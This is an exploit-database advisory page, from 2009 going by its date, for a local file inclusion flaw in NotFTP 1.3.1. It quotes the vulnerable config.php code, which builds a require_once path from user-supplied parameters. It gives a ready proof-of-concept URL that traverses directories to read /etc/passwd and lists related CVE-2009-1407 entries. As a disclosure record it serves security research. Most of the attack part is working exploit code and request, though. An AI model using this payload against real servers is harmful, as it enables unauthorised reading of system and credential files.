Lucene search
KacperEDB-ID:8504HistoryApr 21, 2009 - 12:00 a.m.
NotFTP 1.3.1 - 'newlang' Local File Inclusion
2009-04-2100:00:00
Kacper
www.exploit-db.com
28
AI Score
7.4
Confidence
Low
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/
Author: Kacper
Email: [email protected]
Home: http://devilteam.pl/
DC++ Hub address: bluber-hub.no-ip.biz:2008
Vuln:
File config.php:
#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################
if (isset($newlang))
{
require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}
# NotFTP version. Changing this would be silly. So don't.
PoC:
http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd
The End
=========
# milw0rm.com [2009-04-21]Related
prion
prion
Directory traversal
2009-04-24 14:30:00
cvelist
cvelist
CVE-2009-1407
2009-04-24 14:00:00
cve
cve
CVE-2009-1407
2009-04-24 14:30:00
openvas
openvas
NotFTP 'config.php' Local File Include Vulnerability
2009-04-24 00:00:00
NotFTP 'config.php' Local File Include Vulnerability
2009-04-24 00:00:00
seebug
seebug
NotFTP config.php本地文件包含漏洞
2009-04-28 00:00:00
nvd
nvd
CVE-2009-1407
2009-04-24 14:30:00